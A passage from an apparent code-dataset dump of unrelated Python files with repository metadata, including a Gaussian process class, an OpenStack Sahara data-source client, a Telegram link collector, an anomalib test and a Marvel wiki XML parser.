pyedflib\nfrom multiprocessing import Pool\n\n\n\n\nepochLength = 1000 # In milliseconds\nslidingWindowLength = 10 # In number of epochs\n\ndef calculateLineLength(filename):\n if (re.search('\\.edf', filename) != None):\n f = pyedflib.EdfReader(sys.argv[1])\n numChannels = f.signals_in_file\n print (\"number of signals in file = \", numChannels)\n signal_labels = f.getSignalLabels()\n print (\"signal labels = \", signal_labels)\n\n numSamples = f.getNSamples()[0]\n sampleFrequency = f.getSampleFrequency(0)\n # fields['fs'] contains the frequency\n numSamplesPerEpoch = int(sampleFrequency * 1000 / epochLength)\n sigbufs = np.zeros((numChannels, numSamples))\n for i in np.arange(numChannels):\n sigbufs[i, :] = f.readSignal(i)\n sigbufs = sigbufs.transpose()\n allChannelsDF = pd.DataFrame(data = sigbufs[:,:], columns = signal_labels)\n llDf = 
pd.DataFrame(columns = signal_labels)\n print (allChannelsDF.shape)\n# for i in range(20):\n# allChannelsDF = allChannelsDF.add(other = sig[i, :])\n print (allChannelsDF.head())\n \n for i in range(1000):\n if (i > numSamplesPerEpoch):\n row = allChannelsDF.iloc[i-1] - allChannelsDF.iloc[i]\n for j in range(2, numSamplesPerEpoch):\n row = row + (allChannelsDF.iloc[i-j] - allChannelsDF.iloc[i-j+1])\n# llDf = llDf.append(allChannelsDF.iloc[i] - allChannelsDF.iloc[i+1], \n# ignore_index=True)\n llDf = llDf.append(row, ignore_index=True)\n \n print (\"Printing Line Length Data frame\")\n print (llDf.head())\n return\n\n\n#p = Pool()\n#p.map(calculateLineLength, [filesList[0]])\n#print (filesList[0])\n#calculateLineLength(filesList[0])\n \nprint (sys.argv[1])\ncalculateLineLength(sys.argv[1])\n","repo_name":"pbscires/ExtractAndTransformFeatures","sub_path":"extractFeature_LineLength.py","file_name":"extractFeature_LineLength.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8827974110","text":"\nclass TimeTicker(object):\n def __init__(self, interval, startep, endep):\n self.interval = interval\n self.startep = startep\n self.endep = endep\n self.epoch = startep\n self.EOF = False\n\n def tick(self):\n self.epoch += self.interval\n if self.epoch > self.endep:\n self.EOF = True\n return False\n else:\n return True\n","repo_name":"toku463ne/stockAnalyzer","sub_path":"time_ticker/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33486859785","text":"#/packages/python/anaconda3/bin\n\nfrom __future__ import division\nimport numpy as np\nimport warnings\nfrom .covariance_functions import *\nfrom scipy.stats import multivariate_normal\nfrom scipy.spatial.distance import euclidean\nfrom scipy.spatial import distance_matrix\nfrom numpy.linalg import inv\nfrom scipy.optimize import minimize\n\n\nclass gaussian_process:\n \"\"\"\n This class instantiates an object for basic mean zero Guassian Process Regression\n \"\"\"\n def __init__(self, x_star, x, y, sigma_squared, cov_obj, cov_func='squared_exponential'):\n \"\"\"\n Parameters\n ----------\n x_star: float\n Scalar or vector to be evaluated\n\n x: float\n Feature vector\n\n y: float\n Response vector\n\n sigma_squared: float (scalar)\n Assumed homoscedastic error for error model\n .. math: y_i = f(x_i) + e_i, e_i \\\\sim N(0, \\\\sigma^2)\n\n cov_obj: object\n Covariance function object\n\n cov_func: str (optional)\n Covariance function to be used. Available functions are:\n Squared exponential = 'squared_exponential'\n Matern 5/2 = 'matern_52'\n Matern 3/2 = 'matern_32'\n Attributes\n ----------\n model_error: float (array_like)\n Matrix representing the error model\n .. math: \\\\text{model_error} = \\\\sigma^2 I\n \"\"\"\n self.x_star = x_star\n self.x = x\n self.y = y\n self.sigma_squared = sigma_squared\n self.model_error = self.sigma_squared*np.eye(self.x.shape[0])\n self.cov_obj = cov_obj\n self.cov_func = cov_func\n self.calc_cov_components()\n\n\n def calc_cov_components(self):\n \"\"\"\n Notes\n ----------\n Calculates the block matrix components of the joint Guassian between the GP prior at x and at x^*\n .. math :: [f(x_1), ... 
, f(x_N), f(x^*)]^T \\\\sim \\text{N} \\\\left ( \\\\begin{bmatrix} \\\\mathbf{m} \\\\ m^*\\\\end{bmatrix}, \\\\begin{bmatrix} C(\\\\mathbf{x, x}) & C(\\\\mathbf{x^*x}) \\\\ C(\\\\mathbf{x^*x})^T & C(\\\\mathbf{x^*, x^*})\\\\end{bmatrix}\\\\right)\n\n Attributes\n ----------\n C_xx: array_like\n Covariance function evaluated with x\n\n C_x_star_x: array_like\n Covariance function evaluated with x^* and x\n\n C_star_star: array_like\n Covariance function evaluated with x^*\n \"\"\"\n self.C_xx = getattr(self.cov_obj, self.cov_func)(self.x, self.x)\n self.C_x_star_x = getattr(self.cov_obj, self.cov_func)(self.x_star, self.x)\n self.C_star_star = getattr(self.cov_obj, self.cov_func)(self.x_star, self.x_star)\n\n def calc_mean_cov(self):\n \"\"\"\n Notes\n ----------\n Calculates the posterior mean and covariance of the GP\n\n Attributes\n ----------\n post_mean: float (vector)\n Posterior mean of the GP\n\n post_cov: float (array_like)\n Posterior covariance of the GP\n\n \"\"\"\n # Calculate weights matrix, W = C(x^*, x) (C(x, x) + \\\\sigma^2 I)^{-1}\n M = inv(self.C_xx + self.model_error)\n\n weights = self.C_x_star_x @ M\n\n # Calculate y_star, y^* = W^T y\n self.post_mean = np.transpose(weights) @ self.y\n\n # Calculates posterior variance, var[f(x^*)| y] = C(x^*, x^*) - C(x^*, x) ( C(x, x) + \\\\sigma^2 I)^{-1} C(x^*, x)^T\n self.post_cov = self.C_star_star - self.C_x_star_x @ M @ np.transpose(self.C_x_star_x)\n\n def regression(self):\n \"\"\"\n Attributes\n ----------\n post_var: float (vector)\n Diagonal elements of posterior covariance\n\n Returns\n ----------\n post_mean: float (vector)\n Posterior mean of GP\n\n post_var: float (vector)\n Diagonal elements of posterior covariance\n \"\"\"\n self.calc_mean_cov()\n self.post_var = np.diag(self.post_cov)\n return self.post_mean, self.post_var\n\n def log_marginal_likelihood(self):\n \"\"\"\n Returns\n ----------\n log_marinal_likelihood: float (scalar)\n Log marginal likelihood evaluated at y with covariance:\n .. math :: \\\\sigma^2 I + C(x, x)\n \"\"\"\n return multivariate_normal.logpdf(self.y, cov=(self.model_error + self.C_xx))\n\n\n def optimize_lml(self, bounds=[(10**-3, 10**3),(10**-3, 10**5)], method=None):\n \"\"\"\n Parameters\n ----------\n bounds: sequence, or bounds (optional)\n 1. Instance of Bounds class\n 2. Sequence of (min, max) pairs for each b and tau_1\n\n method: str or callable (optional)\n Type of solver (see scipy.optimize.minimize for details)\n\n Notes\n ----------\n Optimizes hyperparameters of the covariance function by maximimizing the log marginal likelihood. Optimized using BFGS by default from scipy.optimize.minimize method.\n \"\"\"\n # Initial params\n b, tau_1 = self.cov_obj.b, self.cov_obj.tau_1\n params = [b, tau_1]\n\n # Wrapper function used to optimize the log marginal-likelihood\n def func(params):\n # Unpacks parameters to be optimized\n b, tau_1 = params\n\n temp_cov = covariance_functions(b, tau_1)\n\n # Evaluates covariance function\n temp_C_xx = getattr(temp_cov, self.cov_func)(self.x, self.x)\n\n # Evaluates covariance of marginal-likelihood: \\sigma^2 I + C\n covariance = self.model_error + temp_C_xx\n\n # Returns the negative of the marginal log-likelihood multivariate normal (in order to maximize the evaluation)\n return -multivariate_normal.logpdf(self.y, cov=covariance)\n\n # Uses optimization function to find optimal b and tau_1_squared. 
\n res = minimize(func, [b, tau_1], bounds=bounds, method=method)\n\n # Unpacks results of the optimization step\n self.cov_obj.b, self.cov_obj.tau_1 = res.x\n\n # Recalculates the covariance components\n self.calc_cov_components()\n\n def rvs(self, size=None):\n \"\"\"\n Parameters\n -----------\n size: int (optional)\n Number of samples to return. If None, returns only one sample.\n\n Returns\n ----------\n samples: float (vector or array_like)\n Samples drawn from a multivariate normal described by the posterior GP mean and covariance\n \"\"\"\n if not hasattr(self, 'post_mean'):\n self.calc_mean_cov()\n return stats.multivariate_normal.rvs(mean=self.post_mean, cov=self.post_cov, size=size)\n\n def prior_rvs(self, size=None):\n \"\"\"\n Parameters\n -----------\n size: int (optional)\n Number of samples to return. If None, returns only one sample.\n\n Returns\n ----------\n samples: float (vector or array_like)\n Samples drawn from a multivariate normal described by the mean zero GP prior\n \"\"\"\n return stats.multivariate_normal.rvs(mean=np.zeros(len(self.y)), cov=self.C_xx, size=size)","repo_name":"janmichaelcabrera/gp_regression","sub_path":"gaussian_process.py","file_name":"gaussian_process.py","file_ext":"py","file_size_in_byte":7337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"75146331451","text":"from saharaclient.api import base\n\n\nclass DataSources(base.Resource):\n resource_name = 'Data Source'\n\n\nclass DataSourceManagerV1(base.ResourceManager):\n resource_class = DataSources\n version = 1.1\n\n def create(self, name, description, data_source_type,\n url, credential_user=None, credential_pass=None,\n is_public=None, is_protected=None, s3_credentials=None):\n \"\"\"Create a Data Source.\"\"\"\n\n data = {\n 'name': name,\n 'description': description,\n 'type': data_source_type,\n 'url': url,\n }\n credentials = {}\n self._copy_if_defined(credentials,\n user=credential_user,\n password=credential_pass)\n credentials = credentials or s3_credentials\n self._copy_if_defined(data, is_public=is_public,\n is_protected=is_protected,\n credentials=credentials)\n\n return self._create('/data-sources', data, 'data_source')\n\n def list(self, search_opts=None, limit=None, marker=None,\n sort_by=None, reverse=None):\n \"\"\"Get a list of Data Sources.\"\"\"\n query = base.get_query_string(search_opts, limit=limit, marker=marker,\n sort_by=sort_by, reverse=reverse)\n url = \"/data-sources%s\" % query\n return self._page(url, 'data_sources', limit)\n\n def get(self, data_source_id):\n \"\"\"Get information about a Data Source.\"\"\"\n return self._get('/data-sources/%s' % data_source_id, 'data_source')\n\n def delete(self, data_source_id):\n \"\"\"Delete a Data Source.\"\"\"\n self._delete('/data-sources/%s' % data_source_id)\n\n def update(self, data_source_id, update_data):\n \"\"\"Update a Data Source.\n\n :param dict update_data: dict that contains fields that should be\n updated with new values.\n\n Fields that can be updated:\n\n * name\n * description\n * type\n * url\n * is_public\n * is_protected\n * credentials - dict with the keys `user` and `password` for data\n source in Swift, or with the keys `accesskey`, `secretkey`,\n `endpoint`, `ssl`, and `bucket_in_path` for data source in S3\n \"\"\"\n\n if self.version >= 2:\n UPDATE_FUNC = self._patch\n else:\n UPDATE_FUNC = self._update\n\n return UPDATE_FUNC('/data-sources/%s' % data_source_id,\n update_data)\n\n\nclass DataSourceManagerV2(DataSourceManagerV1):\n 
version = 2\n\n\n# NOTE(jfreud): keep this around for backwards compatibility\nDataSourceManager = DataSourceManagerV1\n","repo_name":"openstack/python-saharaclient","sub_path":"saharaclient/api/data_sources.py","file_name":"data_sources.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"78"} +{"seq_id":"70153833532","text":"from django.urls import path, include, re_path\nfrom . import views\n\nurlpatterns = [\n path('', views.main),\n path('main/', views.main, name='city_main'),\n path('news/', views.news, name='city_news'),\n path('city_heads/', views.city_heads, name='city_heads'),\n path('facts/', views.facts, name='city_facts'),\n path('contacts/', views.contacts, name='city_contacts'),\n path('history/', views.history_main, name='city_history'),\n path('history/photo', views.history_photos, name='city_history_1'),\n path('history/people', views.history_people, name='city_history_2')\n]","repo_name":"anmatkovskii/python","sub_path":"ITStep education/DjangoPyLearning/first_django/city_website_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"23477547258","text":"\"\"\" Connect to telegram and find links from recent chats.\n\nTELE_API_ID and TELE_API_HASH must be set in environment to run.\n\nOutput telelinks.tsv file to be loaded into google sheets for further processing.\n <Channel_Name> <link> <date> <found_on_existing_sheets>\n\nExample Summary Columns:\n Unique Links =UNIQUE(SORT('link dump'!B2:B))\n Occurances =COUNTIF('link dump'!B:B,A2)\n First Seen =MINIFS('link dump'!C:C,'link dump'!B:B,A2)\n Last Seen =MAXIFS('link dump'!C:C,'link dump'!B:B,A2)\n Existing Sheets =VLOOKUP(A2, 'link dump'!B:D, 3, FALSE)\n\n\"\"\"\nimport argparse\nimport json\nimport logging\nimport os\nimport re\nfrom collections import defaultdict\nfrom datetime import timedelta, datetime\n\nimport pytz\nfrom telethon.sync import TelegramClient\n\nimport linkcheck\n\nLOG = logging.getLogger('ualinks')\nTELE_API_ID = os.environ.get('TELE_API_ID')\nTELE_API_HASH = os.environ.get('TELE_API_HASH')\n\nTELE_CHANNELS = 'telechannels.json'\nURL_RE = re.compile(\"(https?://[^\\s]+)\")\nDATE_FMT = \"%Y-%m-%d %H:%M:%S\"\nMIN_AGE = 36\nTSV_OUTPUT = \"telelinks.tsv\"\n\n\ndef main():\n args = parse_args()\n level = logging.WARN\n if args.verbose:\n level = logging.INFO\n if args.debug:\n level = logging.DEBUG\n LOG.setLevel(level)\n\n if not all([TELE_API_ID, TELE_API_HASH]):\n LOG.warning(\"TELE_API_ID or TELE_API_HASH not set correctly in environment.\")\n\n with open(TELE_CHANNELS, 'r') as fh:\n channels = json.load(fh)\n\n client = TelegramClient('ualinks', TELE_API_ID, TELE_API_HASH)\n client.start()\n now = datetime.now()\n\n threshhold = pytz.UTC.localize(now - timedelta(hours=args.hours))\n\n links = defaultdict(list)\n for channel_name, channel_id in channels.items():\n LOG.info(\"Looking up %s (%s)\", channel_name, channel_id)\n oldest = None\n newest = None\n kwargs = {'limit': 200}\n try:\n for _ in range(999):\n LOG.debug(\"Iter (%d) on %s\", _, channel_name)\n for message in client.get_messages(channel_id, **kwargs):\n date_string = message.date.strftime(DATE_FMT)\n if oldest is None or message.date < oldest.date:\n oldest = message\n if newest is None or message.date > newest.date:\n newest = message\n\n for url in URL_RE.findall(str(message.message)):\n links[channel_name].append((url, 
date_string))\n if oldest.date < threshhold:\n LOG.debug(\"Oldest message exceeds window: %s\", oldest.date)\n LOG.info(\"Channel complete\")\n break\n else:\n LOG.info(\"Going deeper. max_id=%s\", oldest.id)\n kwargs['max_id'] = oldest.id\n except ValueError:\n LOG.warning(\"Can't connect to: %s\" % channel_name)\n pass\n\n existing_links = {}\n if args.compare:\n existing_links = linkcheck.get_links(args.compare)\n\n with open(args.output, 'w', encoding=\"utf-8\") as fh:\n for channel_name, items in links.items():\n for url, timestamp in items:\n found_sheet = []\n for sheet, elinks in existing_links.items():\n if url in elinks:\n found_sheet.append(sheet)\n\n line = \"\\t\".join([str(channel_name), url, timestamp, ','.join(found_sheet)])\n fh.write(line+\"\\n\")\n print(line)\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('output', type=str, default=TSV_OUTPUT,\n help='Path where output TSV will be written (default: %s)' % TSV_OUTPUT)\n parser.add_argument('-c', '--compare', type=str, help=\"Excel document to compare\")\n parser.add_argument('-d', '--debug', action='store_true', help='Show debug messages.')\n parser.add_argument('-v', '--verbose', action='store_true', help='Show info messages.')\n parser.add_argument('--hours', type=int, default=MIN_AGE,\n help='Number of hours to collect (default: %s)' % MIN_AGE)\n return parser.parse_args()\n\nif __name__=='__main__':\n LOG.addHandler(logging.StreamHandler())\n LOG.handlers[-1].setFormatter(logging.Formatter(logging.BASIC_FORMAT))\n main()","repo_name":"krets/ua-link-helpers","sub_path":"telelinkgrabber.py","file_name":"telelinkgrabber.py","file_ext":"py","file_size_in_byte":4334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6956820935","text":"'''\n\tPACKAGE DEVELOPED BY : SUBHAM GHOSH\n\tROLL NO. : 20CS10065\n\tSECOND YEAR UNDERGRADUATE STUDENT CSE\n\tIIT KGP\n'''\n\n#if degree argument is given wrong then the image is not rotated at all\n#Imports\nfrom PIL import Image\n\nsupported_image_types = [\"<class 'PIL.JpegImagePlugin.JpegImageFile'>\", \"<class 'PIL.PngImagePlugin.PngImageFile'>\", \"<class 'PIL.Image.Image'>\"]\n\nclass RotateImage(object):\n '''\n Rotates the image about the centre of the image.\n '''\n\n def __init__(self, degrees, doNotClipAtEdges=True):\n '''\n Arguments:\n degrees: rotation degree.\n '''\n\n # Write your code here\n self.doNotClipAtEdges = doNotClipAtEdges\n if(type(degrees)==int or type(degrees)==float):\n self.degrees = degrees\n else:\n print(\"\\n<> Exception : Degree Argument must be of Type INT or FLOAT! 
Setting degrees = 0\\n\")\n self.degrees = 0\n\n def __call__(self, sample):\n '''\n Arguments:\n image (numpy array or PIL image)\n\n Returns:\n image (numpy array or PIL image)\n '''\n\n # Write your code here\n if (str(type(sample)) in supported_image_types):\n return sample.rotate(self.degrees,expand=self.doNotClipAtEdges)\n elif (str(type(sample)) == \"<class 'numpy.ndarray'>\"):\n return Image.fromarray(sample).rotate(self.degrees,expand=self.doNotClipAtEdges)\n else:\n print(\"\\n<> Exception : Image Argument must be of Type PIL IMAGE/JPEG IMAGE/PNG IMAGE or NUMPY ARRAY!\\n\")\n return None\n\n\n#testing code for debugging purpose ->\n#obj1 = RotateImage(30);\n#img = Image.open(r\"C:\\Users\\mezartine\\Downloads\\CS29006_SW_Lab_Spr2022-master\\Python_DS_Assignment\\data\\imgs\\5.jpg\").convert('RGBA')\n#RotateImage(30)(img,False).show()\n#img = RotateImage(\"s\")(6)\n","repo_name":"frediff/AI_Image_Toolkit","sub_path":"my_package/data/transforms/rotate.py","file_name":"rotate.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"13546059256","text":"#!/usr/bin/env python\n\nfrom glucose import plots\n\nimport inspect\n\nimport matplotlib.pyplot as plt\n\n\ndef close_plot(fig):\n plt.close(fig.figure)\n\n\ndef load_plots(from_date=None):\n for attribute in dir(plots):\n attribute = getattr(plots, attribute)\n if inspect.isclass(attribute) and issubclass(\n attribute, plots.base.Plot) and attribute.__name__ != 'Plot':\n yield attribute(from_date=from_date)\n","repo_name":"niedbalski/glucose","sub_path":"glucose/plots/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"30983107383","text":"\"\"\"Diagram editor.\nMain application.\n\"\"\"\n\nimport tkinter as tk\n\nfrom ui.workspace import Workspace\nfrom ui.toolbar import Toolbar\n\n\nclass Main:\n \"\"\"Main application class.\n \"\"\"\n WINDOW_WIDTH = 1200\n WINDOW_HEIGHT = 800\n\n def __init__(self):\n \"\"\"Init.\n \"\"\"\n self._root = tk.Tk()\n self._root['bg'] = 'green'\n self._root.title('Diagram editor')\n self._root.geometry(\n f'{self.WINDOW_WIDTH}x{self.WINDOW_HEIGHT}+100+100'\n )\n\n self._toolbar = Toolbar(self._root)\n self._workspace = Workspace(\n self._root,\n pop_selection_from_toolbar_callback=self._toolbar.pop_selected\n )\n\n def run(self):\n \"\"\"Run application.\n \"\"\"\n self._root.mainloop()\n\n\n# ---- START ---- #\n\nif __name__ == '__main__':\n Main().run()\n","repo_name":"sychov/diagram_editor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24906580299","text":"import itertools\nimport math\nimport multiprocessing\nimport random\nimport tempfile\nfrom concurrent.futures import ProcessPoolExecutor\nfrom datetime import datetime\nfrom pathlib import Path\nfrom typing import Dict, List, Union\n\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom omegaconf import DictConfig, ListConfig, OmegaConf\nfrom pytorch_lightning import seed_everything\n\nfrom anomalib.utils.sweep.config import flatten_sweep_params\nfrom tests.helpers.dataset import get_dataset_path\nfrom tests.helpers.model import model_load_test, setup_model_train\n\n\ndef get_model_nncf_cat() -> List:\n \"\"\"Test helper for getting cartesian product of models and 
categories.\n\n Returns:\n List: Returns a combination of models with their nncf support for each category.\n \"\"\"\n model_support = [\n (\"cflow\", False),\n (\"csflow\", False),\n (\"dfkde\", False),\n (\"dfm\", False),\n (\"ganomaly\", False),\n # (\"stfpm\", True),\n (\"padim\", False),\n (\"patchcore\", False),\n (\"stfpm\", False),\n ]\n categories = random.sample(\n [\n \"bottle\",\n \"cable\",\n \"capsule\",\n \"carpet\",\n \"grid\",\n \"hazelnut\",\n \"leather\",\n \"metal_nut\",\n \"pill\",\n \"screw\",\n \"tile\",\n \"toothbrush\",\n \"transistor\",\n \"wood\",\n \"zipper\",\n ],\n k=3,\n )\n\n return [\n (model, nncf, category) for ((model, nncf), category) in list(itertools.product(*[model_support, categories]))\n ]\n\n\nclass TestModel:\n \"\"\"Run Model on all categories.\"\"\"\n\n def _test_metrics(self, trainer, config, model, datamodule):\n \"\"\"Tests the model metrics but also acts as a setup.\"\"\"\n\n results = trainer.test(model=model, datamodule=datamodule)[0]\n\n thresholds = OmegaConf.load(\"tests/nightly/models/performance_thresholds.yaml\")\n\n threshold = thresholds[config.model.name][config.dataset.category]\n if \"optimization\" in config.keys() and \"nncf\" in config.optimization.keys() and config.optimization.nncf.apply:\n threshold = threshold.nncf\n if not (\n np.isclose(results[\"image_AUROC\"], threshold[\"image_AUROC\"], rtol=0.05)\n or (results[\"image_AUROC\"] >= threshold[\"image_AUROC\"])\n ):\n raise AssertionError(\n f\"results['image_AUROC']: {results['image_AUROC']} >= \"\n f\"threshold['image_AUROC']: {threshold['image_AUROC']}\"\n )\n\n if config.dataset.task == \"segmentation\":\n if not (\n np.isclose(results[\"pixel_AUROC\"], threshold[\"pixel_AUROC\"], rtol=0.05)\n or (results[\"pixel_AUROC\"] >= threshold[\"pixel_AUROC\"])\n ):\n raise AssertionError(\n f\"results['pixel_AUROC']:{results['pixel_AUROC']} >= \"\n f\"threshold['pixel_AUROC']:{threshold['pixel_AUROC']}\"\n )\n return results\n\n def _save_to_csv(self, config: Union[DictConfig, ListConfig], results: Dict):\n \"\"\"Save model results to csv. 
Useful for tracking model drift.\n\n Args:\n config (Union[DictConfig, ListConfig]): Model config which is also added to csv for complete picture.\n results (Dict): Metrics from trainer.test\n \"\"\"\n # Save results in csv for tracking model drift\n model_metrics = flatten_sweep_params(config)\n # convert dict, list values to string\n for key, val in model_metrics.items():\n if isinstance(val, (list, dict, ListConfig, DictConfig)):\n model_metrics[key] = str(val)\n for metric, value in results.items():\n model_metrics[metric] = value\n model_metrics_df = pd.DataFrame([model_metrics])\n\n result_path = Path(f\"tests/artifacts/{datetime.now().strftime('%m_%d_%Y')}.csv\")\n result_path.parent.mkdir(parents=True, exist_ok=True)\n if not result_path.is_file():\n model_metrics_df.to_csv(result_path)\n else:\n model_metrics_df.to_csv(result_path, mode=\"a\", header=False)\n\n def runner(self, run_configs, path, score_type, device_id):\n for model_name, nncf, category in run_configs:\n try:\n with tempfile.TemporaryDirectory() as project_path:\n # Fix seed\n seed_everything(42, workers=True)\n config, datamodule, model, trainer = setup_model_train(\n model_name=model_name,\n dataset_path=path,\n nncf=nncf,\n project_path=project_path,\n category=category,\n score_type=score_type,\n device=[device_id],\n )\n\n # test model metrics\n results = self._test_metrics(trainer=trainer, config=config, model=model, datamodule=datamodule)\n\n # test model load\n model_load_test(config=config, datamodule=datamodule, results=results)\n\n self._save_to_csv(config, results)\n except AssertionError as assertion_error:\n raise Exception(f\"Model: {model_name} NNCF:{nncf} Category:{category}\") from assertion_error\n\n def test_model(self, path=get_dataset_path(), score_type=None):\n run_configs = get_model_nncf_cat()\n with ProcessPoolExecutor(\n max_workers=torch.cuda.device_count(), mp_context=multiprocessing.get_context(\"spawn\")\n ) as executor:\n jobs = []\n for device_id, run_split in enumerate(\n range(0, len(run_configs), math.ceil(len(run_configs) / torch.cuda.device_count()))\n ):\n jobs.append(\n executor.submit(\n self.runner,\n run_configs[run_split : run_split + math.ceil(len(run_configs) / torch.cuda.device_count())],\n path,\n score_type,\n device_id,\n )\n )\n for job in jobs:\n try:\n job.result()\n except Exception as e:\n raise e\n","repo_name":"openvinotoolkit/anomalib","sub_path":"tests/nightly/models/test_model_nightly.py","file_name":"test_model_nightly.py","file_ext":"py","file_size_in_byte":6339,"program_lang":"python","lang":"en","doc_type":"code","stars":2572,"dataset":"github-code","pt":"78"} +{"seq_id":"72950744891","text":"__author__ = 'matthewburleson'\n\nimport random\n\ndef nchoices(iterable, number_of_items):\n my_list = []\n try:\n for i in range(0, number_of_items):\n my_list.append(random.choice(iterable))\n except:\n return None\n\n return my_list\n\nprint(nchoices(\"yesterday\", 4))\nprint(nchoices((1,2,3,4,5,6,7), 4))\nprint(nchoices(list('sdkfgjhlgkahga'), 4))\nprint(nchoices({\"a\": \"lfkjslk\", \"b\": \"something else\", \"c\": 4}, 2))","repo_name":"ingusmat/PythonExercises","sub_path":"Collections/nrandom.py","file_name":"nrandom.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9887597322","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 23 08:43:10 2019\n\n@author: xingg\n\"\"\"\n\nimport re\n\nxmlFile = 
open('..\\\\enmarveldatabase_pages_current.xml','r',encoding = 'utf-8')\n\nlines = xmlFile.readlines()\n\ncharacters = {}\ntemp = ['NA','NA','NA','NA','NA','NA','NA','NA','NA','NA','NA','NA','NA']\ncid = ''\nlastLine = ''\n\nfor line in lines:\n \n #<title>\n if \"<title>\" in line:\n temp[0] = line.replace(' <title>','').replace('','').replace('\\r\\n','').replace('\\n','').replace('<br>','').replace('&','').replace('"','\"').replace('<b>','').replace('</b>','')\n \n #1025\n if \"\" in lastLine and \" \" in line:\n cid = line.replace(' ','').replace('','').replace('\\r\\n','').replace('\\n','').replace('<br>','').replace('&','').replace('"','\"').replace('</b>','').replace('<b>','')\n \n #| RealName \n if \"| RealName\" in line and \"RealNameRef\" not in line and \"RealName2\" not in line:\n temp[1] = line.replace('| RealName = ','').replace('\\r\\n','').replace('\\n','').replace('<br>','').replace('&','').replace('"','\"').replace('</b>','').replace('<b>','')\n \n #| CurrentAlias\n if \"| CurrentAlias\" in line and \"| CurrentAlias2\" not in line and \"| CurrentAliasRef\" not in line and \"| CurrentAliasRef\" not in line:\n temp[2] = line.replace('| CurrentAlias = ','').replace('\\r\\n','').replace('\\n','').replace('<br>','').replace('&','').replace('"','\"').replace('</b>','').replace('<b>','')\n \n #| Affiliation\n if \"| Affiliation\" in line:\n temp[3] = line.replace('| Affiliation = ','').replace('\\r\\n','').replace('\\n','').replace('<br>','').replace('&','').replace('"','\"').replace('</b>','').replace('<b>','')\n \n #| Relatives\n if \"| Relatives\" in line:\n temp[4] = line.replace('| Relatives = ','').replace('| Relatives =','').replace('\\r\\n','').replace('\\n','').replace('<br>','').replace('&','').replace('"','\"').replace('</b>','').replace('<b>','')\n \n #| Universe\n if \"| Universe\" in line:\n temp[5] = line.replace('| Universe = ','').replace('\\r\\n','').replace('\\n','').replace('<br>','').replace('&','').replace('"','\"').replace('</b>','').replace('<b>','')\n \n #| Gender\n if \"| Gender\" in line:\n temp[6] = line.replace('| Gender = ','').replace('\\r\\n','').replace('\\n','').replace('<br>','').replace('&','').replace('"','\"').replace('</b>','').replace('<b>','')\n \n #| Height\n if \"| Height\" in line and \"Height2\" not in line :\n temp[7] = line.replace('| Height = ','').replace('| Height =\t','').replace('\\r\\n','').replace('\\n','').replace('<br>','').replace('&','').replace('"','\"').replace('</b>','').replace('<b>','')\n \n #| Weight\n if \"| Weight\" in line and \"Weight2\" not in line:\n temp[8] = line.replace('| Weight = ','').replace('| Weight =\t','').replace('\\r\\n','').replace('\\n','').replace('<br>','').replace('&','').replace('"','\"').replace('</b>','').replace('<b>','')\n \n #| Eyes\n if \"| Eyes\" in line and \"Eyes2\" not in line:\n temp[9] = line.replace('| Eyes = ','').replace('| Eyes = ','').replace('| Eyes =\t','').replace('\\r\\n','').replace('\\n','').replace('<br>','').replace('&','').replace('"','\"').replace('</b>','').replace('<b>','')\n \n #| Hair\n if \"| Hair\" in line and \"Hair2\" not in line:\n temp[10] = line.replace('| Hair = ','').replace('| Hair = ','').replace('| Hair =\t','').replace('\\r\\n','').replace('\\n','').replace('<br>','').replace('&','').replace('"','\"').replace('</b>','').replace('<b>','')\n \n #| Citizenship \n if \"| Citizenship\" in line and \"Citizenship2\" not in line and \"Citizenship3\" not in line:\n temp[11] = line.replace('| Citizenship = ','').replace('| Citizenship =\t','').replace('| 
Citizenship = ','').replace('| Citizenship =\t','').replace('\\r\\n','').replace('\\n','').replace('<br>','').replace('&','').replace('"','\"').replace('</b>','').replace('<b>','')\n \t\n #| Quotation\n if \"| Quotation\" in line:\n temp[12] = line.replace('| Quotation = ','').replace('| Quotation = ','' ).replace('| Quotation = ','' ).replace('| Quotation = ','' ).replace('| Quotation = ','' ).replace('\\r\\n','').replace('\\n','').replace('<br>','').replace('&','').replace('"','\"').replace('</b>','').replace('<b>','')\n \n lastLine = line\n \n if '' in line:\n characters[cid] = temp\n temp = ['NA','NA','NA','NA','NA','NA','NA','NA','NA','NA','NA','NA','NA']\n cid = ''\n lastLine = ''\n \nwriteFile = open('..\\\\rawDataStep1.csv','w',encoding = 'utf-8')\n\nwriteFile.write(\"\\t\\t<RealName>\\t<CurrentAlias>\\t<Affiliation>\\t<Relatives>\\t<Universe>\\t<Gender>\\t<Height>\\t<Weight>\\t<Eyes>\\t<Hair>\\t<Citizenship>\\t<Quotation>\\n\")\nfor key,values in characters.items():\n writeFile.write(key+\"\\t\")\n for v in values:\n writeFile.write(v+\"\\t\")\n 